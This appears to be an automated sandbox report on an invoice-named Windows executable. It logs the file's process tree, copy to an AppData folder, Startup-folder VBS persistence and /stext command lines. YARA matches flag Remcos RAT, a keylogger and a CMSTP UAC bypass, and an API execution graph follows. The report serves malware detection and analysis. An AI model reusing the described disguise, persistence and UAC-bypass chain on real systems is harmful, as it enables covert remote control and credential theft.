                                                                          Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

                                                                          Target ID:0
                                                                          Start time:09:40:08
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\Desktop\z49FACTURA-0987678.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\z49FACTURA-0987678.exe"
                                                                          Imagebase:0xed0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:09:40:09
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\z49FACTURA-0987678.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 26%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:09:40:09
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:5
                                                                          Start time:09:40:15
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:09:40:15
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:09:40:15
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:09:40:21
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs"
                                                                          Imagebase:0x7ff73e7f0000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:09:40:21
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:09:40:22
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:09:40:23
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:09:40:24
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                            Execution Graph

                                                                            Execution Coverage:3.3%
                                                                            Dynamic/Decrypted Code Coverage:0.5%
                                                                            Signature Coverage:10.1%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:174
                                                                            execution_graph: [node and edge listing of the rendered Execution Graph omitted; it is graph layout data rather than readable text. API nodes named in the listing include LoadLibraryA, GetProcAddress, VirtualProtect, ExitProcess, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW, GetModuleFileNameW, GetModuleHandleExW, RtlAllocateHeap, RtlFreeHeap, RtlDecodePointer, RtlEncodePointer, RaiseException, RtlEnterCriticalSection, RtlLeaveCriticalSection, InitializeCriticalSectionAndSpinCount and GetLastError.]
ed35b0 104352->104356 104355->104350 104357 ed35bd 104356->104357 104358 ed35a1 104356->104358 104357->104358 104359 ed35c4 RegOpenKeyExW 104357->104359 104358->104350 104359->104358 104360 ed35de RegQueryValueExW 104359->104360 104361 ed35ff 104360->104361 104362 ed3614 RegCloseKey 104360->104362 104361->104362 104362->104358 104363 ef7c56 104364 ef7c62 _flsall 104363->104364 104400 ef9e08 GetStartupInfoW 104364->104400 104366 ef7c67 104402 ef8b7c GetProcessHeap 104366->104402 104368 ef7cbf 104369 ef7cca 104368->104369 104485 ef7da6 58 API calls 3 library calls 104368->104485 104403 ef9ae6 104369->104403 104372 ef7cd0 104374 ef7cdb __RTC_Initialize 104372->104374 104486 ef7da6 58 API calls 3 library calls 104372->104486 104424 efd5d2 104374->104424 104376 ef7cea 104377 ef7cf6 GetCommandLineW 104376->104377 104487 ef7da6 58 API calls 3 library calls 104376->104487 104443 f04f23 GetEnvironmentStringsW 104377->104443 104380 ef7cf5 104380->104377 104383 ef7d10 104384 ef7d1b 104383->104384 104488 ef30b5 58 API calls 3 library calls 104383->104488 104453 f04d58 104384->104453 104387 ef7d21 104388 ef7d2c 104387->104388 104489 ef30b5 58 API calls 3 library calls 104387->104489 104467 ef30ef 104388->104467 104391 ef7d34 104392 ef7d3f __wwincmdln 104391->104392 104490 ef30b5 58 API calls 3 library calls 104391->104490 104473 ed47d0 104392->104473 104395 ef7d53 104396 ef7d62 104395->104396 104491 ef3358 58 API calls _doexit 104395->104491 104492 ef30e0 58 API calls _doexit 104396->104492 104399 ef7d67 _flsall 104401 ef9e1e 104400->104401 104401->104366 104402->104368 104493 ef3187 36 API calls 2 library calls 104403->104493 104405 ef9aeb 104494 ef9d3c InitializeCriticalSectionAndSpinCount __ioinit 104405->104494 104407 ef9af0 104408 ef9af4 104407->104408 104496 ef9d8a TlsAlloc 104407->104496 104495 ef9b5c 61 API calls 2 library calls 104408->104495 104411 ef9b06 104411->104408 104413 ef9b11 104411->104413 104412 ef9af9 104412->104372 104497 ef87d5 104413->104497 104416 
ef9b53 104505 ef9b5c 61 API calls 2 library calls 104416->104505 104419 ef9b32 104419->104416 104421 ef9b38 104419->104421 104420 ef9b58 104420->104372 104504 ef9a33 58 API calls 4 library calls 104421->104504 104423 ef9b40 GetCurrentThreadId 104423->104372 104425 efd5de _flsall 104424->104425 104426 ef9c0b __lock 58 API calls 104425->104426 104427 efd5e5 104426->104427 104428 ef87d5 __calloc_crt 58 API calls 104427->104428 104429 efd5f6 104428->104429 104430 efd601 _flsall @_EH4_CallFilterFunc@8 104429->104430 104431 efd661 GetStartupInfoW 104429->104431 104430->104376 104437 efd676 104431->104437 104440 efd7a5 104431->104440 104432 efd86d 104519 efd87d RtlLeaveCriticalSection _doexit 104432->104519 104434 ef87d5 __calloc_crt 58 API calls 104434->104437 104435 efd7f2 GetStdHandle 104435->104440 104436 efd805 GetFileType 104436->104440 104437->104434 104439 efd6c4 104437->104439 104437->104440 104438 efd6f8 GetFileType 104438->104439 104439->104438 104439->104440 104517 ef9e2b InitializeCriticalSectionAndSpinCount 104439->104517 104440->104432 104440->104435 104440->104436 104518 ef9e2b InitializeCriticalSectionAndSpinCount 104440->104518 104444 f04f34 104443->104444 104445 ef7d06 104443->104445 104520 ef881d 58 API calls 2 library calls 104444->104520 104449 f04b1b GetModuleFileNameW 104445->104449 104447 f04f5a _memmove 104448 f04f70 FreeEnvironmentStringsW 104447->104448 104448->104445 104451 f04b4f _wparse_cmdline 104449->104451 104450 f04b8f _wparse_cmdline 104450->104383 104451->104450 104521 ef881d 58 API calls 2 library calls 104451->104521 104454 f04d71 __NMSG_WRITE 104453->104454 104458 f04d69 104453->104458 104455 ef87d5 __calloc_crt 58 API calls 104454->104455 104463 f04d9a __NMSG_WRITE 104455->104463 104456 f04df1 104457 ef2d55 _free 58 API calls 104456->104457 104457->104458 104458->104387 104459 ef87d5 __calloc_crt 58 API calls 104459->104463 104460 f04e16 104462 ef2d55 _free 58 API calls 104460->104462 104462->104458 104463->104456 104463->104458 
104463->104459 104463->104460 104464 f04e2d 104463->104464 104522 f04607 58 API calls ___crtsetenv 104463->104522 104523 ef8dc6 IsProcessorFeaturePresent 104464->104523 104466 f04e39 104466->104387 104470 ef30fb __IsNonwritableInCurrentImage 104467->104470 104469 ef3119 __initterm_e 104471 ef2d40 __cinit 67 API calls 104469->104471 104472 ef3138 __cinit __IsNonwritableInCurrentImage 104469->104472 104546 efa4d1 104470->104546 104471->104472 104472->104391 104474 ed47ea 104473->104474 104484 ed4889 104473->104484 104475 ed4824 74D2C8D0 104474->104475 104549 ef336c 104475->104549 104479 ed4850 104561 ed48fd SystemParametersInfoW SystemParametersInfoW 104479->104561 104481 ed485c 104562 ed3b3a 104481->104562 104483 ed4864 SystemParametersInfoW 104483->104484 104484->104395 104485->104369 104486->104374 104487->104380 104491->104396 104492->104399 104493->104405 104494->104407 104495->104412 104496->104411 104500 ef87dc 104497->104500 104499 ef8817 104499->104416 104503 ef9de6 TlsSetValue 104499->104503 104500->104499 104502 ef87fa 104500->104502 104506 f051f6 104500->104506 104502->104499 104502->104500 104514 efa132 Sleep 104502->104514 104503->104419 104504->104423 104505->104420 104507 f05201 104506->104507 104510 f0521c 104506->104510 104508 f0520d 104507->104508 104507->104510 104515 ef8b28 58 API calls __getptd_noexit 104508->104515 104511 f0522c RtlAllocateHeap 104510->104511 104512 f05212 104510->104512 104516 ef33a1 RtlDecodePointer 104510->104516 104511->104510 104511->104512 104512->104500 104514->104502 104515->104512 104516->104510 104517->104439 104518->104440 104519->104430 104520->104447 104521->104450 104522->104463 104524 ef8dd1 104523->104524 104529 ef8c59 104524->104529 104528 ef8dec 104528->104466 104530 ef8c73 _memset __call_reportfault 104529->104530 104531 ef8c93 IsDebuggerPresent 104530->104531 104537 efa155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104531->104537 104534 ef8d57 __call_reportfault 104538 efc5f6 104534->104538 104535 
ef8d7a 104536 efa140 GetCurrentProcess TerminateProcess 104535->104536 104536->104528 104537->104534 104539 efc5fe 104538->104539 104540 efc600 IsProcessorFeaturePresent 104538->104540 104539->104535 104542 f0590a 104540->104542 104545 f058b9 5 API calls 2 library calls 104542->104545 104544 f059ed 104544->104535 104545->104544 104547 efa4d4 RtlEncodePointer 104546->104547 104547->104547 104548 efa4ee 104547->104548 104548->104469 104550 ef9c0b __lock 58 API calls 104549->104550 104551 ef3377 RtlDecodePointer RtlEncodePointer 104550->104551 104614 ef9d75 RtlLeaveCriticalSection 104551->104614 104553 ed4849 104554 ef33d4 104553->104554 104555 ef33de 104554->104555 104556 ef33f8 104554->104556 104555->104556 104615 ef8b28 58 API calls __getptd_noexit 104555->104615 104556->104479 104558 ef33e8 104616 ef8db6 9 API calls ___crtsetenv 104558->104616 104560 ef33f3 104560->104479 104561->104481 104563 ed3b47 __ftell_nolock 104562->104563 104564 ed7667 59 API calls 104563->104564 104565 ed3b51 GetCurrentDirectoryW 104564->104565 104617 ed3766 104565->104617 104567 ed3b7a IsDebuggerPresent 104568 f0d272 MessageBoxA 104567->104568 104569 ed3b88 104567->104569 104570 f0d28c 104568->104570 104569->104570 104571 ed3ba5 104569->104571 104604 ed3c61 104569->104604 104827 ed7213 59 API calls Mailbox 104570->104827 104698 ed7285 104571->104698 104572 ed3c68 SetCurrentDirectoryW 104575 ed3c75 Mailbox 104572->104575 104575->104483 104576 f0d29c 104581 f0d2b2 SetCurrentDirectoryW 104576->104581 104578 ed3bc3 GetFullPathNameW 104579 ed7bcc 59 API calls 104578->104579 104580 ed3bfe 104579->104580 104714 ee092d 104580->104714 104581->104575 104584 ed3c1c 104585 ed3c26 104584->104585 104828 f2874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104584->104828 104730 ed3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104585->104730 104588 f0d2cf 104588->104585 104591 f0d2e0 104588->104591 104594 ed4706 61 API calls 104591->104594 104592 ed3c30 104593 ed3c43 
104592->104593 104738 ed434a 104592->104738 104749 ee09d0 104593->104749 104597 f0d2e8 104594->104597 104599 ed7de1 59 API calls 104597->104599 104598 ed3c4e 104598->104604 104826 ed443a Shell_NotifyIconW _memset 104598->104826 104600 f0d2f5 104599->104600 104601 f0d324 104600->104601 104602 f0d2ff 104600->104602 104606 ed7cab 59 API calls 104601->104606 104605 ed7cab 59 API calls 104602->104605 104604->104572 104607 f0d30a 104605->104607 104608 f0d320 GetForegroundWindow ShellExecuteW 104606->104608 104829 ed7b2e 104607->104829 104612 f0d354 Mailbox 104608->104612 104612->104604 104613 ed7cab 59 API calls 104613->104608 104614->104553 104615->104558 104616->104560 104618 ed7667 59 API calls 104617->104618 104619 ed377c 104618->104619 104838 ed3d31 104619->104838 104621 ed379a 104622 ed4706 61 API calls 104621->104622 104623 ed37ae 104622->104623 104624 ed7de1 59 API calls 104623->104624 104625 ed37bb 104624->104625 104852 ed4ddd 104625->104852 104628 ed37dc Mailbox 104876 ed8047 104628->104876 104629 f0d173 104923 f3955b 104629->104923 104632 f0d192 104635 ef2d55 _free 58 API calls 104632->104635 104637 f0d19f 104635->104637 104639 ed4e4a 84 API calls 104637->104639 104641 f0d1a8 104639->104641 104645 ed3ed0 59 API calls 104641->104645 104642 ed7de1 59 API calls 104643 ed3808 104642->104643 104883 ed84c0 104643->104883 104647 f0d1c3 104645->104647 104646 ed381a Mailbox 104648 ed7de1 59 API calls 104646->104648 104649 ed3ed0 59 API calls 104647->104649 104650 ed3840 104648->104650 104651 f0d1df 104649->104651 104652 ed84c0 69 API calls 104650->104652 104653 ed4706 61 API calls 104651->104653 104655 ed384f Mailbox 104652->104655 104654 f0d204 104653->104654 104656 ed3ed0 59 API calls 104654->104656 104658 ed7667 59 API calls 104655->104658 104657 f0d210 104656->104657 104659 ed8047 59 API calls 104657->104659 104660 ed386d 104658->104660 104661 f0d21e 104659->104661 104887 ed3ed0 104660->104887 104663 ed3ed0 59 API calls 104661->104663 104666 f0d22d 104663->104666 
